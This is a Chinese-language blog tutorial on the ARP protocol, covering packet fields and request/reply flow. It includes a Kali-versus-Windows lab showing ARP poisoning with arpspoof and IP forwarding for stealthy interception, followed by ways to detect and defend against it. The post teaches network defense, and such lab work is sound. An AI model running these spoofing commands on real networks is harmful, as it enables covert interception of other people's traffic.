网络层协议-ARP协议

news2024/9/20 16:47:09

网络层协议-ARP协议

1)概述

ARP:地址解析协议,作用:根据IP地址查询MAC地址

数据包发送前需要进行封包,在数据链路层需要封装源mac地址是自己的mac,目的mac地址是别人,但是不知道别人的mac地址,此时需要由arp协议获取mac地址

ARP分别请求包和响应包

2)ARP工作机制

image-20240830100752748

1.首先A主机需要对ARP协议封包,ARP协议(源IP地址:自己,目的IP地址:手动填写,源mac地址自己,目的mac地址填充地址)
2.以太网协议封包,源mac是自己,目的mac:广播地址(ff-ff)
3.发送出去
4.交换机识别到数据帧,查看mac头部,目的mac是广播,所以广播出去
5.C主机查看mac头,查看arp协议,目的IP不是自己,丢弃
6.B主机查看mac头,查看arp协议,目的IP是自己,封装回包
7.B主机封装arp协议,源mac自己,目的mac对方,源IP地址自己,目的IP地址对方
8.以太网协议封装,源mac自己,目的mac对方
9.交换机收到arp响应后,查看mac头,目的mac在自身缓存表,所以进行单播出去

image-20240830101914904

ARP数据包会经过交换机,但是不会经过路由器,属于局域网协议

3)ARP协议字段分析

ARP请求包
Hardware type: Ethernet (1)   硬件类型:以太网
Protocol type: IPv4 (0x0800)  协议类型:ipv4
Hardware size: 6              硬件大小
Protocol size: 4              协议大小
Opcode: request (1)			  操作码:1表示请求 2表示响应
Sender MAC address: Intel_26:1f:29 (60:57:18:26:1f:29)		源mac地址
Sender IP address: 192.168.2.89								源IP地址
Target MAC address: 00:00:00_00:00:00 (00:00:00:00:00:00)	目的mac地址
Target IP address: 192.168.2.1								目的IP地址

ARP响应包
Hardware type: Ethernet (1)   硬件类型:以太网
Protocol type: IPv4 (0x0800)  协议类型:ipv4
Hardware size: 6              硬件大小
Protocol size: 4              协议大小
Opcode: reply (2)             操作码:1表示请求 2表示响应
Sender MAC address: RuijieNetwor_e9:45:11 (80:05:88:e9:45:11)
Sender IP address: 192.168.2.1
Target MAC address: Intel_26:1f:29 (60:57:18:26:1f:29)
Target IP address: 192.168.2.89

主机拿到对方的MAC地址后,缓存在自身的MAC表里,下次就直接从MAC表里拿对方的MAC地址

4)ARP攻击

image-20240830112250158

准备:
1台window10 作为靶机
1台kali 作为攻击者

image-20240830112800286

kali开始实施攻击
1.kali下载名令dsniff
apt-get install dsniff

2.实施攻击
arpspoof -i 接口名称 -t 目标IP地址 -r 网关IP地址

arpspoof -i 接口名称 -t win10IP地址 -r 网关IP地址

ip a  查看的是eth0网卡名称

arpspoof -i eth0 -t 192.168.159.131 -r 192.168.159.2

image-20240830113727390

通过抓包发现,kali发送了2种响应包,一个是攻击目标主机的,一个是攻击网关的,对象不一样

win10被攻击者前显示的mac表

C:\Users\zhangsan>arp -a

接口: 192.168.159.131 --- 0x3
  Internet 地址         物理地址              类型
  192.168.159.2         00-50-56-e9-9e-0a     动态
  192.168.159.255       ff-ff-ff-ff-ff-ff     静态
  224.0.0.22            01-00-5e-00-00-16     静态
  224.0.0.252           01-00-5e-00-00-fc     静态
  239.255.255.250       01-00-5e-7f-ff-fa     静态
  255.255.255.255       ff-ff-ff-ff-ff-ff     静态

win10被攻击者后显示的mac表

C:\Users\zhangsan>arp -a

接口: 192.168.159.131 --- 0x3
  Internet 地址         物理地址              类型
  192.168.159.2         00-0c-29-be-f2-73     动态
  192.168.159.132       00-0c-29-be-f2-73     动态
  192.168.159.255       ff-ff-ff-ff-ff-ff     静态
  224.0.0.22            01-00-5e-00-00-16     静态
  224.0.0.252           01-00-5e-00-00-fc     静态
  239.255.255.250       01-00-5e-7f-ff-fa     静态
  255.255.255.255       ff-ff-ff-ff-ff-ff     静态

5)ARP欺骗

使用ARP攻击靶机会立马让靶机警觉,可能靶机会去检查网络是否故障,容易发现被攻击,使用arp欺骗更具有隐蔽性

ARP欺骗在的原理是在ARP攻击基础上,让攻击者进行转发数据给路由器,做到神不知鬼不觉的监控靶机

在kali上有一个配置文件,修改配置问价即可实现数据转发,配置文件路径在/proc/sys/net/ipv4/ip_forward

echo 1 >> /proc/sys/net/ipv4/ip_forward    修改该配置文件内容为1

攻击者在使用arpspoof攻击命令可以让靶机受到攻击的同时根本感受不到遭受攻击

image-20240830143321380

6)ARP研判

使用tracert命令查看下一条路由器IP地址
正常如下
C:\Users\Administrator>tracert 192.168.2.1

通过最多 30 个跃点跟踪到 192.168.2.1 的路由

  1     2 ms     1 ms     1 ms  192.168.2.1

跟踪完成。

被攻击如下
C:\Users\Administrator>tracert 192.168.159.2

通过最多 30 个跃点跟踪到 192.168.159.2 的路由

  1    <1 毫秒    *        *     192.168.159.132
  2    <1 毫秒   <1 毫秒   <1 毫秒 192.168.159.2

跟踪完成。

发现路由器是第二跳IP地址,说明遭受到攻击

arp -a查看mac地址是否有一样的,但是IP地址不一样,说明遭受到攻击
C:\Users\Administrator>arp -a

接口: 192.168.159.131 --- 0x3
  Internet 地址         物理地址              类型
  192.168.159.2         00-0c-29-be-f2-73     动态
  192.168.159.132       00-0c-29-be-f2-73     动态
  192.168.159.254       00-50-56-ee-26-2f     动态
  192.168.159.255       ff-ff-ff-ff-ff-ff     静态
  224.0.0.22            01-00-5e-00-00-16     静态
  224.0.0.252           01-00-5e-00-00-fc     静态
  239.255.255.250       01-00-5e-7f-ff-fa     静态
  255.255.255.255       ff-ff-ff-ff-ff-ff     静态

7)ARP防范

1.在使用者电脑上安装360ARP防火墙

2.设置交换机上端口安全功能

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2118500.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

西门子WinCC开发笔记(一):winCC西门子组态软件介绍、安装

文为原创文章&#xff0c;转载请注明原文出处 本文章博客地址&#xff1a;https://hpzwl.blog.csdn.net/article/details/142060535 长沙红胖子Qt&#xff08;长沙创微智科&#xff09;博文大全&#xff1a;开发技术集合&#xff08;包含Qt实用技术、树莓派、三维、OpenCV、Op…

C++11第三弹:lambda表达式 | 新的类功能 | 模板的可变参数

&#x1f308;个人主页&#xff1a; 南桥几晴秋 &#x1f308;C专栏&#xff1a; 南桥谈C &#x1f308;C语言专栏&#xff1a; C语言学习系列 &#x1f308;Linux学习专栏&#xff1a; 南桥谈Linux &#x1f308;数据结构学习专栏&#xff1a; 数据结构杂谈 &#x1f308;数据…

为什么RAG对下一代AI开发至关重要

RAG&#xff08;检索增强生成&#xff09;是一种突破性技术&#xff0c;它将信息检索与文本生成相结合&#xff0c;以提高人工智能系统的知识和准确性。利用 RAG 可以帮助开发人员确保应用程序响应具有最丰富的上下文和准确性&#xff0c;因为它可以访问原始模型训练之外的精选…

解决samba无权限创建文件问题

将我服务器利用samba工具映射到到电脑后&#xff0c;没有权限在特定的文件里写文件&#xff0c;比如在mcu这个文件夹里面没有写文件的权限。 查看mcu文件夹的用户属性&#xff0c;属于root属性。 rootzwzn2064-CVN-Z690D5-GAMING-PRO:/home/zwzn2064# ls -ll total 9714860 dr…

MySQL 自学笔记(入门基础篇,含示例)

目录 一、基础1.变量2.运算符 二、数据库与表1.创建数据库2.表的增删与修改&#xff08;1&#xff09;表的创建与删除&#xff08;2&#xff09;表的修改&#xff08;3&#xff09;其他指令 3.属性约束4.数据操作&#xff08;1&#xff09;数据更新&#xff08;2&#xff09;数…

Hive任务优化参数整理

Hive本身是个基于hdfs的结构化数据管理工具&#xff0c;虽然在后面的发展中允许底层接入其他的数据源&#xff0c;比如第三方数据服务这种基础架构&#xff0c;但是它从立意上来说&#xff0c;它不适合用来做高性能查询引擎&#xff0c;反而在传统离线数据仓库中它有着自身的优…

在连通无向图中寻找正反向各通过每条边一次的路径(中国邮递员问题)

在连通无向图中寻找正反向各通过每条边一次的路径(中国邮递员问题) 引言问题定义算法思路具体步骤第一步:找出所有奇度顶点第二步:将奇度顶点配对,并添加最短路径第三步:构造欧拉回路伪代码C语言实现引言 在图论中,中国邮递员问题(Chinese Postman Problem, CPP)是一…

高精度E4990A参数资料keysight是德e4990a阻抗分析仪

Keysight E4990A 阻抗分析仪的规格&#xff1a; 工作频率选项&#xff1a; 20 Hz 至 10 MHz20 Hz 至 20 MHz20 Hz 至 30 MHz20 Hz 至 50 MHz20 Hz 至 120 MHz选项分别为 010 / 020 / 030 / 050 / 120 测量参数&#xff1a;lZl、lYl、O、R、X、G、B、L、C、D、Q、复合 Z、复合…

DBA 的 AI 助手 | MySQL 清理 undo log 居然用了 10 个小时?

社区王牌专栏《一问一实验&#xff1a;AI 版》全新改版归来&#xff0c;得到了新老读者们的关注。其中不乏对 ChatDBA 感兴趣的读者前来咨询&#xff0c;表达了想试用体验 ChatDBA 的意愿&#xff0c;对此我们表示感谢 &#x1f91f;。 目前&#xff0c;ChatDBA 还在最后的准备…

keil调试技巧 keil中的debug调试技巧单片机调试技巧 定位单片机程序异常位置 定位程序异常错误原因计算程序执行时间多少

单片机常用调试技巧(B站UP分享) 如何查看程序运行时间 使用Event Recorder 组件 查看运行时间 https://blog.csdn.net/twx11213030422/article/details/114013796 https://blog.csdn.net/weixin_43866583/article/details/125874888?spm1001.2101.3001.6661.1&utm_med…

大数据开发概论

大数据开发概论 文章目录 大数据开发概论大数据定义大数据概念计算机组成原理软件和硬件概述操作系统 大数据定义 大数据(Big Data)&#xff0c;是指无法在一定时间范围内用常规软件工具进行捕捉、管理和处理的数据集合&#xff0c;因此需要新处理模式&#xff0c;该处理模式就…

SpinalHDL之数据类型(二)

本文作为SpinalHDL学习笔记第五十五篇,介绍SpinalHDL的Bits数据类型。 目录: 1.描述(Description) 2.声明(Declaration) 3.操作符(Operators) 1.描述(Description) Bits类型对应于没有算数意义的bits向量。 2.声明(Declaration) 声明bit向量的语法如下所⽰:([]中为可填…

让图片变成动画,@keyframes:动画制作

keyframes被称为关键帧&#xff0c;其类似于Flash中的关键帧。在CSS3中其主要以“keyframes”开头&#xff0c;后面跟着是动画名称加上一对花括号“{…}”&#xff0c;括号中是一些不同时间段样式规则。 语法&#xff1a;keyframes animationname {keyframes-selector{css-styl…

Windows terminal使用说明

1 terminal基本介绍 1 下载 从微软商店上下载的方式网速比较慢&#xff0c;一种直接的方式是直接用命令行运行命令 winget install --idMicrosoft.WindowsTerminal -e# Window Terminal 安装以及使用(2021最新) 2 ssh配置 # 使用Windows Terminal进行SSH登录 1 通过label…

网安学习与木马病毒

一、网安知识学习大点(B站大学) 现状&#xff1a;掌握基本的编程思想、了解过网络知识、听说过一些网安的东西 0、法律 1、操作系统&#xff08;Windows和Linux&#xff09; 2、数据通信&#xff08;网络&#xff09; 3、数据库&#xff08;mysql&#xff09; 4、一门编程…

高效诊断Linux性能问题

从uptime命令开始&#xff1b;这里的关键指标是平均负载&#xff0c;它显示了过去 1分钟&#xff0c;5分钟和15分钟内正在运行或等待资源的进程平均数量&#xff1b;如果这些数字持续高于CPU内核数&#xff0c;则可能表明进程正在争夺资源&#xff0c;提示我们使用其他工具深入…

“视频号小店:微信新零售生态中的创新引擎与未来展望“

随着数字技术的快速发展&#xff0c;微信视频号利用其社交特性和庞大的用户基础&#xff0c;正逐渐崭露头角&#xff0c;成为新零售行业的新宠。视频号小店&#xff0c;作为这一生态系统中的创新亮点&#xff0c;为商家提供了一个集商品展示、交易促成和营销策略于一体的全新商…

企业文件加密软件怎么选?2024超好用的十款企业文档加密软件推荐!臻品优选!

"数据如金需锁固&#xff0c;密文守护保安宁。" 文件加密软件是守护企业数据安全的重要利器&#xff0c;选择一款适合企业自身需求的加密软件&#xff0c;不仅能够提升数据安全性&#xff0c;还能优化团队协作效率&#xff0c;确保业务连续性。 本文特为您臻选2024年…

安卓framework美化手势导航侧滑返回UI

文章目录 手势导航的侧滑返回效果图原生效果如下:要实现的功能,: 实现代码1. 初始化代码2. 修改绘制的代码,进行箭头与退出UI的显示3. 拖动的时候手指上下移动时,箭头ui跟着移动 以下是一些其他可以美化安卓右滑手势拖动 UI 的方法&#xff1a;视觉效果方面形状和布局方面 安卓…

「电商运营」高客单和低客单产品及选品的运营区别

高客单和低客单产品在运营重点和选品方向上存在明显的差异。在实际运营中&#xff0c;需要根据产品的特点和市场需求&#xff0c;制定合适的运营策略和选品方向&#xff0c;以实现产品的成功运营和盈利。 一、高客单产品运营重点 1、目标客户精准定位 由于高客单产品价格较高…